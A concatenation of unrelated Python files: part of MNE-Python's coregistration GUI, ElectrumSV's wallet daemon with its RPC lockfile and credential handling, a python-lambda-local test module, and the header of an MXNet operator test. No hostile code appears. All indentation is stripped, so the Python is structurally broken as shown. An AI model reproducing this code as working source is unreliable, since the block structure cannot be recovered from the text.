def _get_tgt_pts(self):
pts = self.mri_pts * self.scale
pts -= self.tgt_origin
return pts
@cached_property
def _get_tgt_fid(self):
fid = self.mri_fid * self.scale
fid -= self.tgt_origin
return fid
@cached_property
def _get_translation(self):
trans = np.array([self.trans_x, self.trans_y, self.trans_z])
return trans
def _fit_ap_fired(self):
GUI.set_busy()
self.model.fit_auricular_points()
GUI.set_busy(False)
def _fit_fid_fired(self):
GUI.set_busy()
self.model.fit_fiducials()
GUI.set_busy(False)
def _fit_hsp_points_fired(self):
GUI.set_busy()
self.model.fit_hsp_points()
GUI.set_busy(False)
def _fits_ap_fired(self):
GUI.set_busy()
self.model.fit_scale_auricular_points()
GUI.set_busy(False)
def _fits_fid_fired(self):
GUI.set_busy()
self.model.fit_scale_fiducials()
GUI.set_busy(False)
def _fits_hsp_points_fired(self):
GUI.set_busy()
self.model.fit_scale_hsp_points()
GUI.set_busy(False)
def _reset_params_fired(self):
self.model.reset()
def _rot_x_dec_fired(self):
self.rot_x -= self.rot_step
def _rot_x_inc_fired(self):
self.rot_x += self.rot_step
def _rot_y_dec_fired(self):
self.rot_y -= self.rot_step
def _rot_y_inc_fired(self):
self.rot_y += self.rot_step
def _rot_z_dec_fired(self):
self.rot_z -= self.rot_step
def _rot_z_inc_fired(self):
self.rot_z += self.rot_step
def _load_trans_fired(self):
# find trans file destination
raw_dir = os.path.dirname(self.model.hsp.file)
subject = self.model.mri.subject
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject)
dlg = FileDialog(action="open", wildcard=trans_wildcard,
default_path=trans_file)
dlg.open()
if dlg.return_code != OK:
return
trans_file = dlg.path
try:
self.model.load_trans(trans_file)
except Exception as e:
error(None, "Error loading trans file %s: %s (See terminal "
"for details)" % (trans_file, e), "Error Loading Trans File")
raise
def _save_fired(self):
subjects_dir = self.model.mri.subjects_dir
subject_from = self.model.mri.subject
# check that fiducials are saved
skip_fiducials = False
if self.n_scale_params and not _find_fiducials_files(subject_from,
subjects_dir):
msg = ("No fiducials file has been found for {src}. If fiducials "
"are not saved, they will not be available in the scaled "
"MRI. Should the current fiducials be saved now? "
"Select Yes to save the fiducials at "
"{src}/bem/{src}-fiducials.fif. "
"Select No to proceed scaling the MRI without fiducials.".
format(src=subject_from))
title = "Save Fiducials for %s?" % subject_from
rc = confirm(None, msg, title, cancel=True, default=CANCEL)
if rc == CANCEL:
return
elif rc == YES:
self.model.mri.save(self.model.mri.default_fid_fname)
elif rc == NO:
skip_fiducials = True
else:
raise RuntimeError("rc=%s" % repr(rc))
# find target subject
if self.n_scale_params:
subject_to = self.model.raw_subject or subject_from
mridlg = NewMriDialog(subjects_dir=subjects_dir,
subject_from=subject_from,
subject_to=subject_to)
ui = mridlg.edit_traits(kind='modal')
if not ui.result: # i.e., user pressed cancel
return
subject_to = mridlg.subject_to
else:
subject_to = subject_from
# find trans file destination
raw_dir = os.path.dirname(self.model.hsp.file)
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject_to)
dlg = FileDialog(action="save as", wildcard=trans_wildcard,
default_path=trans_file)
dlg.open()
if dlg.return_code != OK:
return
trans_file = dlg.path
if not trans_file.endswith('.fif'):
trans_file += '.fif'
if os.path.exists(trans_file):
answer = confirm(None, "The file %r already exists. Should it "
"be replaced?", "Overwrite File?")
if answer != YES:
return
# save the trans file
try:
self.model.save_trans(trans_file)
except Exception as e:
error(None, "Error saving -trans.fif file: %s (See terminal for "
"details)" % (e,), "Error Saving Trans File")
raise
# save the scaled MRI
if self.n_scale_params:
job = self.model.get_scaling_job(subject_to, skip_fiducials)
self.queue.put(job)
self.queue_len += 1
def _scale_x_dec_fired(self):
self.scale_x -= self.scale_step
def _scale_x_inc_fired(self):
self.scale_x += self.scale_step
def _scale_y_dec_fired(self):
self.scale_y -= self.scale_step
def _scale_y_inc_fired(self):
self.scale_y += self.scale_step
def _scale_z_dec_fired(self):
self.scale_z -= self.scale_step
def _scale_z_inc_fired(self):
self.scale_z += self.scale_step
def _trans_x_dec_fired(self):
self.trans_x -= self.trans_step
def _trans_x_inc_fired(self):
self.trans_x += self.trans_step
def _trans_y_dec_fired(self):
self.trans_y -= self.trans_step
def _trans_y_inc_fired(self):
self.trans_y += self.trans_step
def _trans_z_dec_fired(self):
self.trans_z -= self.trans_step
def _trans_z_inc_fired(self):
self.trans_z += self.trans_step
class NewMriDialog(HasPrivateTraits):
"""New MRI dialog."""
# Dialog to determine target subject name for a scaled MRI
subjects_dir = Directory
subject_to = Str
subject_from = Str
subject_to_dir = Property(depends_on=['subjects_dir', 'subject_to'])
subject_to_exists = Property(Bool, depends_on='subject_to_dir')
feedback = Str(' ' * 100)
can_overwrite = Bool
overwrite = Bool
can_save = Bool
view = View(Item('subject_to', label='New MRI Subject Name', tooltip="A "
"new folder with this name will be created in the "
"current subjects_dir for the scaled MRI files"),
Item('feedback', show_label=False, style='readonly'),
Item('overwrite', enabled_when='can_overwrite', tooltip="If a "
"subject with the chosen name exists, delete the old "
"subject"),
buttons=[CancelButton,
Action(name='OK', enabled_when='can_save')])
def _can_overwrite_changed(self, new):
if not new:
self.overwrite = False
@cached_property
def _get_subject_to_dir(self):
return os.path.join(self.subjects_dir, self.subject_to)
@cached_property
def _get_subject_to_exists(self):
if not self.subject_to:
return False
elif os.path.exists(self.subject_to_dir):
return True
else:
return False
@on_trait_change('subject_to_dir,overwrite')
def update_dialog(self):
if not self.subject_from:
# weird trait state that occurs even when subject_from is set
return
elif not self.subject_to:
self.feedback = "No subject specified..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to == self.subject_from:
self.feedback = "Must be different from MRI source subject..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to_exists:
if self.overwrite:
self.feedback = "%s will be overwritten." % self.subject_to
self.can_save = True
self.can_overwrite = True
else:
self.feedback = "Subject already exists..."
self.can_save = False
self.can_overwrite = True
else:
self.feedback = "Name ok."
self.can_save = True
self.can_overwrite = False
def _make_view(tabbed=False, split=False, scene_width=500, scene_height=400,
scrollable=True):
"""Create a view for the CoregFrame.
Parameters
----------
tabbed : bool
Combine the data source panel and the coregistration panel into a
single panel with tabs.
split : bool
Split the main panels with a movable splitter (good for QT4 but
unnecessary for wx backend).
scene_width : int
Specify a minimum width for the 3d scene (in pixels).
scrollable : bool
Make the coregistration panel vertically scrollable (default True).
Returns
-------
view : traits View
View object for the CoregFrame.
"""
scene = VGroup(
Item('scene', show_label=False,
editor=SceneEditor(scene_class=MayaviScene),
dock='vertical', width=scene_width, height=scene_height),
VGroup(
Item('headview', style='custom'),
'view_options',
show_border=True, show_labels=False, label='View'))
data_panel = VGroup(
VGroup(Item('subject_panel', style='custom'), label="MRI Subject",
show_border=True, show_labels=False),
VGroup(Item('lock_fiducials', style='custom',
editor=EnumEditor(cols=2, values={False: '2:Edit',
True: '1:Lock'}),
enabled_when='fid_ok'),
HGroup('hsp_always_visible',
Label("Always Show Head Shape Points"),
show_labels=False),
Item('fid_panel', style='custom'),
label="MRI Fiducials", show_border=True, show_labels=False),
VGroup(Item('raw_src', style="custom"),
HGroup('guess_mri_subject',
Label('Guess MRI Subject from File Name'),
show_labels=False),
HGroup(Item('distance', show_label=False, width=20),
'omit_points', 'reset_omit_points', show_labels=False),
Item('omitted_info', style='readonly', show_label=False),
label='Head Shape Source (Raw/Epochs/Evoked/DigMontage)',
show_border=True, show_labels=False),
show_labels=False, label="Data Source")
# Setting `scrollable=True` for a Group does not seem to have any effect
# (macOS), in order to be effective the parameter has to be set for a View
# object; hence we use a special InstanceEditor to set the parameter
# programmatically:
coreg_panel = VGroup(
# width=410 is optimized for macOS to avoid a horizontal scroll-bar;
# might benefit from platform-specific values
Item('coreg_panel', style='custom', width=410 if scrollable else 1,
editor=InstanceEditor(view=_make_view_coreg_panel(scrollable))),
label="Coregistration", show_border=not scrollable, show_labels=False,
enabled_when="fid_panel.locked")
main_layout = 'split' if split else 'normal'
if tabbed:
main = HGroup(scene,
Group(data_panel, coreg_panel, show_labels=False,
layout='tabbed'),
layout=main_layout)
else:
main = HGroup(data_panel, scene, coreg_panel, show_labels=False,
layout=main_layout)
# Here we set the width and height to impossibly small numbers to force the
# window to be as tight as possible
view = View(main, resizable=True, handler=CoregFrameHandler(),
buttons=NoButtons, width=scene_width, height=scene_height)
return view
class ViewOptionsPanel(HasTraits):
"""View options panel."""
mri_obj = Instance(SurfaceObject)
hsp_obj = Instance(PointObject)
eeg_obj = Instance(PointObject)
view = View(VGroup(Item('mri_obj', style='custom',
label="MRI head"),
Item('hsp_obj', style='custom',
label="Head shape"),
Item('eeg_obj', style='custom',
label='EEG')),
title="View Options")
class CoregFrame(HasTraits):
"""GUI for head-MRI coregistration."""
model = Instance(CoregModel)
scene = Instance(MlabSceneModel, ())
headview = Instance(HeadViewController)
subject_panel = Instance(SubjectSelectorPanel)
fid_panel = Instance(FiducialsPanel)
coreg_panel = Instance(CoregPanel)
view_options_panel = Instance(ViewOptionsPanel)
raw_src = DelegatesTo('model', 'hsp')
guess_mri_subject = DelegatesTo('model')
# Omit Points
distance = Float(5., desc="maximal distance for head shape points from "
"MRI in mm")
omit_points = Button(label='Omit [mm]', desc="to omit head shape points "
"for the purpose of the automatic coregistration "
"procedure.")
reset_omit_points = Button(label='Reset', desc="to reset the "
"omission of head shape points to include all.")
omitted_info = Property(Str, depends_on=['model.hsp.n_omitted'])
fid_ok = DelegatesTo('model', 'mri.fid_ok')
lock_fiducials = DelegatesTo('model')
hsp_always_visible = Bool(False, label="Always Show Head Shape")
title = Str('MNE Coreg')
# visualization
hsp_obj = Instance(PointObject)
eeg_obj = Instance(PointObject)
mri_obj = Instance(SurfaceObject)
lpa_obj = Instance(PointObject)
nasion_obj = Instance(PointObject)
rpa_obj = Instance(PointObject)
hsp_lpa_obj = Instance(PointObject)
hsp_nasion_obj = Instance(PointObject)
hsp_rpa_obj = Instance(PointObject)
hsp_visible = Property(depends_on=['hsp_always_visible', 'lock_fiducials'])
view_options = Button(label="View Options")
picker = Instance(object)
# Processing
queue = DelegatesTo('coreg_panel')
view = _make_view()
def _model_default(self):
return CoregModel(
scale_labels=self._config.get(
'MNE_COREG_SCALE_LABELS', 'true') == 'true',
copy_annot=self._config.get(
'MNE_COREG_COPY_ANNOT', 'true') == 'true',
prepare_bem_model=self._config.get(
'MNE_COREG_PREPARE_BEM', 'true') == 'true')
def _subject_panel_default(self):
return SubjectSelectorPanel(model=self.model.mri.subject_source)
def _fid_panel_default(self):
return FiducialsPanel(model=self.model.mri, headview=self.headview)
def _coreg_panel_default(self):
return CoregPanel(model=self.model)
def _headview_default(self):
return HeadViewController(scene=self.scene, system='RAS')
def __init__(self, raw=None, subject=None, subjects_dir=None,
guess_mri_subject=True, head_opacity=1.,
head_high_res=True, trans=None, config=None): # noqa: D102
self._config = config or {}
super(CoregFrame, self).__init__(guess_mri_subject=guess_mri_subject)
self.subject_panel.model.use_high_res_head = head_high_res
if not 0 <= head_opacity <= 1:
raise ValueError(
"head_opacity needs to be a floating point number between 0 "
"and 1, got %r" % (head_opacity,))
self._initial_head_opacity = head_opacity
if (subjects_dir is not None) and os.path.isdir(subjects_dir):
self.model.mri.subjects_dir = subjects_dir
if raw is not None:
self.model.hsp.file = raw
if subject is not None:
if subject not in self.model.mri.subject_source.subjects:
msg = "%s is not a valid subject. " % subject
# no subjects -> ['']
if any(self.model.mri.subject_source.subjects):
ss = ', '.join(self.model.mri.subject_source.subjects)
msg += ("The following subjects have been found: %s "
"(subjects_dir=%s). " %
(ss, self.model.mri.subjects_dir))
else:
msg += ("No subjects were found in subjects_dir=%s. " %
self.model.mri.subjects_dir)
msg += ("Make sure all MRI subjects have head shape files "
"(run $ mne make_scalp_surfaces).")
raise ValueError(msg)
self.model.mri.subject = subject
if trans is not None:
try:
self.model.load_trans(trans)
except Exception as e:
error(None, "Error loading trans file %s: %s (See terminal "
"for details)" % (trans, e), "Error Loading Trans File")
@on_trait_change('subject_panel.subject')
def _set_title(self):
self.title = '%s - MNE Coreg' % self.model.mri.subject
@on_trait_change('scene.activated')
def _init_plot(self):
_toggle_mlab_render(self, False)
lpa_color = defaults['lpa_color']
nasion_color = defaults['nasion_color']
rpa_color = defaults['rpa_color']
# MRI scalp
color = defaults['head_color']
self.mri_obj = SurfaceObject(points=self.model.transformed_mri_points,
color=color, tri=self.model.mri.tris,
scene=self.scene, name="MRI Scalp",
# opacity=self._initial_head_opacity,
# setting opacity here causes points to be
# [[0, 0, 0]] -- why??
)
self.mri_obj.opacity = self._initial_head_opacity
# on_trait_change was unreliable, so link it another way:
self.model.mri.on_trait_change(self._on_mri_src_change, 'tris')
self.model.sync_trait('transformed_mri_points', self.mri_obj, 'points',
mutual=False)
self.fid_panel.hsp_obj = self.mri_obj
# MRI Fiducials
point_scale = defaults['mri_fid_scale']
self.lpa_obj = PointObject(scene=self.scene, color=lpa_color,
point_scale=point_scale, name='LPA')
self.model.mri.sync_trait('lpa', self.lpa_obj, 'points', mutual=False)
self.model.sync_trait('scale', self.lpa_obj, 'trans', mutual=False)
self.nasion_obj = PointObject(scene=self.scene, color=nasion_color,
point_scale=point_scale, name='Nasion')
self.model.mri.sync_trait('nasion', self.nasion_obj, 'points',
mutual=False)
self.model.sync_trait('scale', self.nasion_obj, 'trans', mutual=False)
self.rpa_obj = PointObject(scene=self.scene, color=rpa_color,
point_scale=point_scale, name='RPA')
self.model.mri.sync_trait('rpa', self.rpa_obj, 'points', mutual=False)
self.model.sync_trait('scale', self.rpa_obj, 'trans', mutual=False)
# Digitizer Head Shape
color = defaults['extra_color']
point_scale = defaults['extra_scale']
p = PointObject(view='cloud', scene=self.scene, color=color,
point_scale=point_scale, resolution=5, name='HSP')
self.hsp_obj = p
self.model.hsp.sync_trait('points', p, mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
# Digitizer EEG
color = defaults['eeg_color']
point_scale = defaults['eeg_scale']
p = PointObject(view='cloud', scene=self.scene, color=color,
point_scale=point_scale, resolution=5, name='EEG')
self.eeg_obj = p
self.model.hsp.sync_trait('eeg_points', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
# Digitizer Fiducials
point_scale = defaults['dig_fid_scale']
opacity = defaults['dig_fid_opacity']
p = PointObject(scene=self.scene, color=lpa_color, opacity=opacity,
point_scale=point_scale, name='HSP-LPA')
self.hsp_lpa_obj = p
self.model.hsp.sync_trait('lpa', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
p = PointObject(scene=self.scene, color=nasion_color, opacity=opacity,
point_scale=point_scale, name='HSP-Nasion')
self.hsp_nasion_obj = p
self.model.hsp.sync_trait('nasion', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
p = PointObject(scene=self.scene, color=rpa_color, opacity=opacity,
point_scale=point_scale, name='HSP-RPA')
self.hsp_rpa_obj = p
self.model.hsp.sync_trait('rpa', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
on_pick = self.scene.mayavi_scene.on_mouse_pick
self.picker = on_pick(self.fid_panel._on_pick, type='cell')
self.headview.left = True
_toggle_mlab_render(self, True)
self.scene.render()
self.scene.camera.focal_point = (0., 0., 0.)
self.view_options_panel = ViewOptionsPanel(mri_obj=self.mri_obj,
hsp_obj=self.hsp_obj,
eeg_obj=self.eeg_obj)
@cached_property
def _get_hsp_visible(self):
return self.hsp_always_visible or self.lock_fiducials
@cached_property
def _get_omitted_info(self):
if self.model.hsp.n_omitted == 0:
return "No points omitted"
elif self.model.hsp.n_omitted == 1:
return "1 point omitted"
else:
return "%i points omitted" % self.model.hsp.n_omitted
def _omit_points_fired(self):
distance = self.distance / 1000.
self.model.omit_hsp_points(distance)
def _reset_omit_points_fired(self):
self.model.omit_hsp_points(0, True)
@on_trait_change('model.mri.tris')
def _on_mri_src_change(self):
if self.mri_obj is None:
return
if not (np.any(self.model.mri.points) and np.any(self.model.mri.tris)):
self.mri_obj.clear()
return
self.mri_obj.points = self.model.mri.points
self.mri_obj.tri = self.model.mri.tris
self.mri_obj.plot()
# automatically lock fiducials if a good fiducials file is loaded
@on_trait_change('model.mri.fid_file')
def _on_fid_file_loaded(self):
if self.model.mri.fid_file:
self.fid_panel.locked = True
else:
self.fid_panel.locked = False
def _view_options_fired(self):
self.view_options_panel.edit_traits()
def save_config(self, home_dir=None):
"""Write configuration values."""
set_config('MNE_COREG_GUESS_MRI_SUBJECT',
str(self.model.guess_mri_subject).lower(),
home_dir, set_env=False)
set_config('MNE_COREG_HEAD_HIGH_RES',
str(self.model.mri.use_high_res_head).lower(),
home_dir, set_env=False)
set_config('MNE_COREG_HEAD_OPACITY',
str(self.mri_obj.opacity),
home_dir, set_env=False)
set_config('MNE_COREG_SCALE_LABELS',
str(self.model.scale_labels).lower(),
home_dir, set_env=False)
set_config('MNE_COREG_COPY_ANNOT',
str(self.model.copy_annot).lower(),
home_dir, set_env=False)
set_config('MNE_COREG_PREPARE_BEM',
str(self.model.prepare_bem_model).lower(),
home_dir, set_env=False)
if self.model.mri.subjects_dir:
set_config('MNE_COREG_SUBJECTS_DIR',
self.model.mri.subjects_dir,
home_dir, set_env=False)
|
daemon.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import ast
import base64
from typing import Optional, Tuple, Any
import os
import time
import jsonrpclib
from .restapi import AiohttpServer
from .app_state import app_state
from .commands import known_commands, Commands
from .exchange_rate import FxTask
from .jsonrpc import VerifyingJSONRPCServer
from .logs import logs
from .network import Network
from .simple_config import SimpleConfig
from .storage import WalletStorage
from .util import json_decode, DaemonThread, to_string, random_integer, get_wallet_name_from_path
from .version import PACKAGE_VERSION
from .wallet import Wallet
from .restapi_endpoints import DefaultEndpoints
logger = logs.get_logger("daemon")
def get_lockfile(config: SimpleConfig) -> str:
return os.path.join(config.path, 'daemon')
def remove_lockfile(lockfile: str) -> None:
logger.debug("removing lockfile")
try:
os.unlink(lockfile)
except OSError:
pass
def get_fd_or_server(config: SimpleConfig) -> Tuple[Optional[int], Optional[jsonrpclib.Server]]:
'''Tries to create the lockfile, using O_EXCL to
prevent races. If it succeeds it returns the FD.
Otherwise try and connect to the server specified in the lockfile.
If this succeeds, the server is returned. Otherwise remove the
lockfile and try again.'''
lockfile = get_lockfile(config)
while True:
try:
return os.open(lockfile, os.O_CREAT | os.O_EXCL | os.O_WRONLY, 0o644), None
except OSError:
pass
server = get_server(config)
if server is not None:
return None, server
# Couldn't connect; remove lockfile and try again.
remove_lockfile(lockfile)
def get_server(config: SimpleConfig) -> Optional[jsonrpclib.Server]:
lockfile_path = get_lockfile(config)
while True:
create_time = None
server_url = None
try:
with open(lockfile_path) as f:
(host, port), create_time = ast.literal_eval(f.read())
rpc_user, rpc_password = get_rpc_credentials(config)
if rpc_password == '':
# authentication disabled
server_url = 'http://%s:%d' % (host, port)
else:
server_url = 'http://%s:%s@%s:%d' % (
rpc_user, rpc_password, host, port)
server = jsonrpclib.Server(server_url)
# Test daemon is running
server.ping()
return server
except ConnectionRefusedError:
logger.warning("get_server could not connect to the rpc server, is it running?")
except SyntaxError:
if os.path.getsize(lockfile_path):
logger.exception("RPC server lockfile exists, but is invalid")
else:
# Our caller 'get_fd_or_server' has created the empty file before we check.
logger.warning("get_server could not connect to the rpc server, is it running?")
except FileNotFoundError as e:
if lockfile_path == e.filename:
logger.info("attempt to connect to the RPC server failed")
else:
logger.exception("attempt to connect to the RPC server failed")
except Exception:
logger.exception("attempt to connect to the RPC server failed")
if not create_time or create_time < time.time() - 1.0:
return None
# Sleep a bit and try again; it might have just been started
time.sleep(1.0)
def get_rpc_credentials(config: SimpleConfig, is_restapi=False) \
-> Tuple[Optional[str], Optional[str]]:
rpc_user = config.get('rpcuser', None)
rpc_password = config.get('rpcpassword', None)
if rpc_user is None or rpc_password is None:
rpc_user = 'user'
nbits = 128
pw_int = random_integer(nbits)
pw_b64 = base64.b64encode(
pw_int.to_bytes(nbits // 8, 'big'), b'-_')
rpc_password = to_string(pw_b64, 'ascii')
config.set_key('rpcuser', rpc_user)
config.set_key('rpcpassword', rpc_password, save=True)
elif rpc_password == '' and not is_restapi:
logger.warning('No password set for RPC API. Access is therefore granted to any users.')
elif rpc_password == '' and is_restapi:
logger.warning('No password set for REST API. Access is therefore granted to any users.')
return rpc_user, rpc_password
class Daemon(DaemonThread):
def __init__(self, fd, is_gui: bool) -> None:
super().__init__('daemon')
app_state.daemon = self
config = app_state.config
self.config = config
if config.get('offline'):
self.network = None
self.fx_task = None
app_state.read_headers()
else:
self.network = Network()
app_state.fx = FxTask(app_state.config, self.network)
self.fx_task = app_state.async_.spawn(app_state.fx.refresh_loop)
self.wallets = {}
# RPC API - (synchronous)
self.init_server(config, fd, is_gui)
# self.init_thread_watcher()
self.is_gui = is_gui
# REST API - (asynchronous)
self.rest_server = None
if app_state.config.get("restapi"):
self.init_restapi_server(config, fd)
self.configure_restapi_server()
def configure_restapi_server(self):
self.default_api = DefaultEndpoints()
self.rest_server.register_routes(self.default_api)
def init_restapi_server(self, config: SimpleConfig, fd) -> None:
host = config.get('rpchost', '127.0.0.1')
restapi_port = int(config.get('restapi_port', 9999))
username, password = get_rpc_credentials(config, is_restapi=True)
self.rest_server = AiohttpServer(host=host, port=restapi_port, username=username,
password=password)
def init_server(self, config: SimpleConfig, fd, is_gui: bool) -> None:
host = config.get('rpchost', '127.0.0.1')
port = config.get('rpcport', 8888)
rpc_user, rpc_password = get_rpc_credentials(config)
try:
server = VerifyingJSONRPCServer((host, port), logRequests=False,
rpc_user=rpc_user, rpc_password=rpc_password)
except Exception as e:
logger.error('Warning: cannot initialize RPC server on host %s %s', host, e)
self.server = None
os.close(fd)
return
os.write(fd, bytes(repr((server.socket.getsockname(), time.time())), 'utf8'))
os.close(fd)
self.server = server
server.timeout = 0.1
server.register_function(self.ping, 'ping')
server.register_function(self.run_gui, 'gui')
server.register_function(self.run_daemon, 'daemon')
server.register_function(self.run_cmdline, 'run_cmdline')
def init_thread_watcher(self) -> None:
import threading
import sys
import traceback
def _watcher():
while True:
for th in threading.enumerate():
th_text = str(th)
# if "GUI" not in th_text:
# continue
print(th)
traceback.print_stack(sys._current_frames()[th.ident])
print()
time.sleep(5.0)
t = threading.Thread(target=_watcher)
t.setDaemon(True)
t.start()
def ping(self) -> bool:
return True
def run_daemon(self, config_options: dict) -> Any:
config = SimpleConfig(config_options)
sub = config.get('subcommand')
assert sub in [None, 'start', 'stop', 'status', 'load_wallet', 'close_wallet']
if sub in [None, 'start']:
response = "Daemon already running"
elif sub == 'load_wallet':
path = config.get_cmdline_wallet_filepath()
wallet = self.load_wallet(path) if path is not None else None
self.cmd_runner._wallet = wallet
response = True
elif sub == 'close_wallet':
path = WalletStorage.canonical_path(config.get_cmdline_wallet_filepath())
if path in self.wallets:
self.stop_wallet_at_path(path)
response = True
else:
response = False
elif sub == 'status':
if self.network:
response = self.network.status()
response.update({
'fee_per_kb': self.config.fee_per_kb(),
'path': self.config.path,
'version': PACKAGE_VERSION,
'wallets': {k: w.is_synchronized() for k, w in self.wallets.items()},
})
else:
response = "Daemon offline"
elif sub == 'stop':
self.stop()
response = "Daemon stopped"
return response
def run_gui(self, config_options: dict) -> str:
config = SimpleConfig(config_options)
if hasattr(app_state, 'windows'):
path = config.get_cmdline_wallet_filepath()
app_state.app.new_window(path, config.get('url'))
return "ok"
return "error: ElectrumSV is running in daemon mode; stop the daemon first."
def load_wallet(self, wallet_filepath: str) -> Wallet:
# wizard will be launched if we return
if wallet_filepath in self.wallets:
wallet = self.wallets[wallet_filepath]
return wallet
if not WalletStorage.files_are_matched_by_path(wallet_filepath):
return
storage = WalletStorage(wallet_filepath)
if storage.requires_split():
storage.close()
logger.debug("Wallet '%s' requires an split", wallet_filepath)
return
if storage.requires_upgrade():
storage.close()
logger.debug("Wallet '%s' requires an upgrade", wallet_filepath)
return
wallet = Wallet(storage)
self.start_wallet(wallet)
return wallet
def get_wallet(self, path: str) -> Wallet:
wallet_filepath = WalletStorage.canonical_path(path)
return self.wallets.get(wallet_filepath)
def start_wallet(self, wallet: Wallet) -> None:
# We expect the storage path to be exact, including the database extension. So it should
# match the canonical path used elsewhere.
self.wallets[wallet.get_storage_path()] = wallet
wallet.start(self.network)
def stop_wallet_at_path(self, path: str) -> None:
wallet_filepath = WalletStorage.canonical_path(path)
# Issue #659 wallet may already be stopped.
if wallet_filepath in self.wallets:
wallet = self.wallets.pop(wallet_filepath)
wallet.stop()
def stop_wallets(self):
for path in list(self.wallets.keys()):
self.stop_wallet_at_path(path)
def run_cmdline(self, config_options: dict) -> Any:
password = config_options.get('password')
new_password = config_options.get('new_password')
config = SimpleConfig(config_options)
cmdname = config.get('cmd')
cmd = known_commands[cmdname]
if cmd.requires_wallet:
wallet_path = WalletStorage.canonical_path(config.get_cmdline_wallet_filepath())
wallet = self.wallets.get(wallet_path)
if wallet is None:
return {'error': 'Wallet "%s" is not loaded. Use "electrum-sv daemon load_wallet"'
% get_wallet_name_from_path(wallet_path)}
else:
wallet = None
# arguments passed to function
args = [config.get(x) for x in cmd.params]
# decode json arguments
args = [json_decode(i) for i in args]
# options
kwargs = {}
for x in cmd.options:
kwargs[x] = (config_options.get(x) if x in ['password', 'new_password']
else config.get(x))
cmd_runner = Commands(config, wallet, self.network)
func = getattr(cmd_runner, cmd.name)
result = func(*args, **kwargs)
return result
def on_stop(self):
if self.rest_server and self.rest_server.is_alive:
app_state.async_.spawn_and_wait(self.rest_server.stop)
self.logger.debug("stopped.")
def launch_restapi(self):
if not self.rest_server.is_alive:
self._restapi_future = app_state.async_.spawn(self.rest_server.launcher)
self.rest_server.is_alive = True
def run(self) -> None:
if app_state.config.get("restapi"):
self.launch_restapi()
while self.is_running():
self.server.handle_request() if self.server else time.sleep(0.1)
logger.warning("no longer running")
if self.network:
logger.warning("wait for network shutdown")
self.fx_task.cancel()
app_state.async_.spawn_and_wait(self.network.shutdown_wait)
self.on_stop()
def stop(self) -> None:
logger.warning("stopping")
super().stop()
self.stop_wallets()
remove_lockfile(get_lockfile(self.config))
|
test_direct_invocations.py | '''
python-lambda-local: Test Direct Invocations
(command-line and direct).
Meant for use with py.test.
Copyright 2015-2020 HENNGE K.K. (formerly known as HDE, Inc.)
Licensed under MIT
'''
import json
import argparse
from multiprocessing import Process
import os
from lambda_local.main import run as lambda_run
from lambda_local.main import call as lambda_call
from lambda_local.main import ERR_TYPE_EXCEPTION
from lambda_local.context import Context
def my_lambda_function(event, context):
print("Hello World from My Lambda Function!")
return 42
def my_failing_lambda_function(event, context):
raise Exception('Oh no')
def test_function_call_for_pytest():
(result, error_type) = lambda_call(
my_lambda_function, {}, Context(1))
assert error_type is None
assert result == 42
def test_handle_exceptions_gracefully():
(result, error_type) = lambda_call(
my_failing_lambda_function, {}, Context(1))
assert error_type is ERR_TYPE_EXCEPTION
def test_check_command_line():
request = json.dumps({})
request_file = 'check_command_line_event.json'
with open(request_file, "w") as f:
f.write(request)
args = argparse.Namespace(event=request_file,
file='tests/test_direct_invocations.py',
function='my_lambda_function',
timeout=1,
environment_variables='',
library=None,
version_name='',
arn_string=''
)
p = Process(target=lambda_run, args=(args,))
p.start()
p.join()
os.remove(request_file)
assert p.exitcode == 0
def test_check_command_line_error():
request = json.dumps({})
request_file = 'check_command_line_event.json'
with open(request_file, "w") as f:
f.write(request)
args = argparse.Namespace(event=request_file,
file='tests/test_direct_invocations.py',
function='my_failing_lambda_function',
timeout=1,
environment_variables='',
library=None,
version_name='',
arn_string=''
)
p = Process(target=lambda_run, args=(args,))
p.start()
p.join()
os.remove(request_file)
assert p.exitcode == 1
|
test_operator.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
